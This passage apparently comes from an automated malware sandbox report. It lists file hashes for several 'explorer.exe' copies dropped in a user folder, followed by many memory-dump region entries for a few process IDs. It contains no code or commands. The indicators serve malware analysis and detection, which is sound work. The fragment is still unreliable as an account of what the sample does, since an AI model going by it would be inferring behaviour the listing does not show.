                                  4f26971331fbe1d40e65d493f9417ebcca5e331b61285da2575629b7cd57bdb35ec480cf3ef9a1df48c949360ba9038797575a6181d79b52e1092e4f98bebb3e

                                • C:\Users\Admin\explorer.exe

                                  Filesize

                                  3.4MB

                                  MD5

                                  43f2654a11a6c401cc6f269c8927e360

                                  SHA1

                                  5cf8827830e6a6a627343aca41d891688b85552f

                                  SHA256

                                  10e5693d73b2d5ec2aedb9dcd5a3e9e90c418a4f7301873830329c6994e9016c

                                  SHA512

                                  f4aa1c404dd3c1f773955ddc77f3934803d463da5fd128ea125e51e31a6fbf2cb7daaa2a934108fd3016af1f45bccd181ab00ada5d58428f16e8a0ea3473e575

                                • C:\Users\Admin\explorer.exe

                                  Filesize

                                  3.2MB

                                  MD5

                                  a606769bd3abf93c9dda7abe71b7efb3

                                  SHA1

                                  96b1792b80e1d367b762dabbb4f919997ab811c8

                                  SHA256

                                  d54fa13b463d70e90769a9ef3af2d4b4cb3aac75d91fc51334d89c55d562c3f0

                                  SHA512

                                  6cedf6054f9fed4ee011d2015a06fa50685f1b48ae70222d357868e6d7ec4909f571e7bde6d79f17f06aa0625633131bcd2eeed49533978c413ee9cd1029ae00

                                • C:\Users\Admin\explorer.exe

                                  Filesize

                                  2.9MB

                                  MD5

                                  b90af67ccf0424689dc404df631672ea

                                  SHA1

                                  7e406e8af1a496a41c0d3630e35ca50ed4ba017e

                                  SHA256

                                  b655ee09fc533c10cdf7a8ac06b914614a6a1bc6896ba01b312162ba64aec05b

                                  SHA512

                                  dcc64df0c38ca857b7510718f9176861feb8de55abed09a534660dfbc92a897119c7a555a3571a71f6e59e21175507e14c0d5f884ebbd93cc4b68a9e6c7a743d

                                • \??\pipe\crashpad_2788_DEPCNSNKQIVWQQUW

                                  MD5

                                  d41d8cd98f00b204e9800998ecf8427e

                                  SHA1

                                  da39a3ee5e6b4b0d3255bfef95601890afd80709

                                  SHA256

                                  e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                  SHA512

                                  cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                • memory/692-247-0x0000000004B10000-0x0000000004B20000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/692-378-0x000000007EFB0000-0x000000007EFC0000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/692-362-0x0000000006D90000-0x0000000006DC4000-memory.dmp

                                  Filesize

                                  208KB

                                • memory/692-274-0x00000000057F0000-0x0000000005856000-memory.dmp

                                  Filesize

                                  408KB

                                • memory/692-372-0x0000000006370000-0x000000000638E000-memory.dmp

                                  Filesize

                                  120KB

                                • memory/692-276-0x0000000005860000-0x00000000058C6000-memory.dmp

                                  Filesize

                                  408KB

                                • memory/692-239-0x0000000072FA0000-0x0000000073751000-memory.dmp

                                  Filesize

                                  7.7MB

                                • memory/692-285-0x00000000058D0000-0x0000000005C27000-memory.dmp

                                  Filesize

                                  3.3MB

                                • memory/692-287-0x0000000005DA0000-0x0000000005DBE000-memory.dmp

                                  Filesize

                                  120KB

                                • memory/692-388-0x0000000072FA0000-0x0000000073751000-memory.dmp

                                  Filesize

                                  7.7MB

                                • memory/692-289-0x00000000062E0000-0x000000000632C000-memory.dmp

                                  Filesize

                                  304KB

                                • memory/692-385-0x0000000007460000-0x0000000007468000-memory.dmp

                                  Filesize

                                  32KB

                                • memory/692-248-0x0000000005150000-0x000000000577A000-memory.dmp

                                  Filesize

                                  6.2MB

                                • memory/692-384-0x0000000007440000-0x000000000745A000-memory.dmp

                                  Filesize

                                  104KB

                                • memory/692-244-0x00000000028C0000-0x00000000028F6000-memory.dmp

                                  Filesize

                                  216KB

                                • memory/692-383-0x0000000007340000-0x0000000007355000-memory.dmp

                                  Filesize

                                  84KB

                                • memory/692-382-0x0000000007330000-0x000000000733E000-memory.dmp

                                  Filesize

                                  56KB

                                • memory/692-361-0x0000000004B10000-0x0000000004B20000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/692-379-0x00000000072F0000-0x0000000007301000-memory.dmp

                                  Filesize

                                  68KB

                                • memory/692-377-0x0000000007380000-0x0000000007416000-memory.dmp

                                  Filesize

                                  600KB

                                • memory/692-376-0x0000000007160000-0x000000000716A000-memory.dmp

                                  Filesize

                                  40KB

                                • memory/692-374-0x0000000007720000-0x0000000007D9A000-memory.dmp

                                  Filesize

                                  6.5MB

                                • memory/692-373-0x0000000006DD0000-0x0000000006E74000-memory.dmp

                                  Filesize

                                  656KB

                                • memory/692-363-0x00000000744B0000-0x00000000744FC000-memory.dmp

                                  Filesize

                                  304KB

                                • memory/692-354-0x0000000072FA0000-0x0000000073751000-memory.dmp

                                  Filesize

                                  7.7MB

                                • memory/692-273-0x0000000004EE0000-0x0000000004F02000-memory.dmp

                                  Filesize

                                  136KB

                                • memory/692-375-0x00000000070E0000-0x00000000070FA000-memory.dmp

                                  Filesize

                                  104KB

                                • memory/3468-344-0x0000000004200000-0x0000000004600000-memory.dmp

                                  Filesize

                                  4.0MB

                                • memory/3468-350-0x0000000075620000-0x0000000075872000-memory.dmp

                                  Filesize

                                  2.3MB

                                • memory/3468-343-0x0000000000DE0000-0x0000000000E4D000-memory.dmp

                                  Filesize

                                  436KB

                                • memory/3468-342-0x00007FFE80620000-0x00007FFE80829000-memory.dmp

                                  Filesize

                                  2.0MB

                                • memory/3468-341-0x0000000004200000-0x0000000004600000-memory.dmp

                                  Filesize

                                  4.0MB

                                • memory/3468-340-0x0000000004200000-0x0000000004600000-memory.dmp

                                  Filesize

                                  4.0MB

                                • memory/3468-339-0x0000000004200000-0x0000000004600000-memory.dmp

                                  Filesize

                                  4.0MB

                                • memory/3468-224-0x0000000000DE0000-0x0000000000E4D000-memory.dmp

                                  Filesize

                                  436KB

                                • memory/3468-422-0x00007FFE80620000-0x00007FFE80829000-memory.dmp

                                  Filesize

                                  2.0MB

                                • memory/3656-353-0x0000000002D00000-0x0000000003100000-memory.dmp

                                  Filesize

                                  4.0MB

                                • memory/3656-380-0x0000000002D00000-0x0000000003100000-memory.dmp

                                  Filesize

                                  4.0MB

                                • memory/3656-359-0x0000000002D00000-0x0000000003100000-memory.dmp

                                  Filesize

                                  4.0MB

                                • memory/3656-357-0x00007FFE80620000-0x00007FFE80829000-memory.dmp

                                  Filesize

                                  2.0MB

                                • memory/3656-355-0x0000000002D00000-0x0000000003100000-memory.dmp

                                  Filesize

                                  4.0MB

                                • memory/3656-351-0x0000000000E90000-0x0000000000E99000-memory.dmp

                                  Filesize

                                  36KB

                                • memory/3656-360-0x0000000075620000-0x0000000075872000-memory.dmp

                                  Filesize

                                  2.3MB

                                • memory/3656-381-0x00007FFE80620000-0x00007FFE80829000-memory.dmp

                                  Filesize

                                  2.0MB

                                • memory/4472-335-0x00007FFE75440000-0x00007FFE75459000-memory.dmp

                                  Filesize

                                  100KB

                                • memory/4472-400-0x00007FFE77200000-0x00007FFE77224000-memory.dmp

                                  Filesize

                                  144KB

                                • memory/4472-337-0x00007FFE770F0000-0x00007FFE770FD000-memory.dmp

                                  Filesize

                                  52KB

                                • memory/4472-333-0x00007FFE771E0000-0x00007FFE771F8000-memory.dmp

                                  Filesize

                                  96KB

                                • memory/4472-330-0x00007FFE77200000-0x00007FFE77224000-memory.dmp

                                  Filesize

                                  144KB

                                • memory/4472-328-0x00007FFE7B010000-0x00007FFE7B01F000-memory.dmp

                                  Filesize

                                  60KB

                                • memory/4472-314-0x00007FFE66A60000-0x00007FFE66EC6000-memory.dmp

                                  Filesize

                                  4.4MB

                                • memory/4472-415-0x00007FFE66A60000-0x00007FFE66EC6000-memory.dmp

                                  Filesize

                                  4.4MB

                                • memory/4472-336-0x00007FFE771B0000-0x00007FFE771DC000-memory.dmp

                                  Filesize

                                  176KB

                                • memory/4472-399-0x00007FFE66A60000-0x00007FFE66EC6000-memory.dmp

                                  Filesize

                                  4.4MB

                                • memory/4472-389-0x00007FFE66A60000-0x00007FFE66EC6000-memory.dmp

                                  Filesize

                                  4.4MB

                                • memory/4872-263-0x00007FFE770F0000-0x00007FFE770FF000-memory.dmp

                                  Filesize

                                  60KB

                                • memory/4872-286-0x00007FFE5C6C0000-0x00007FFE5CB26000-memory.dmp

                                  Filesize

                                  4.4MB

                                • memory/4872-262-0x00007FFE5FF20000-0x00007FFE5FF44000-memory.dmp

                                  Filesize

                                  144KB

                                • memory/4872-271-0x00007FFE70D60000-0x00007FFE70D78000-memory.dmp

                                  Filesize

                                  96KB

                                • memory/4872-246-0x00007FFE5C6C0000-0x00007FFE5CB26000-memory.dmp

                                  Filesize

                                  4.4MB

                                • memory/4872-272-0x00007FFE5FEF0000-0x00007FFE5FF1C000-memory.dmp

                                  Filesize

                                  176KB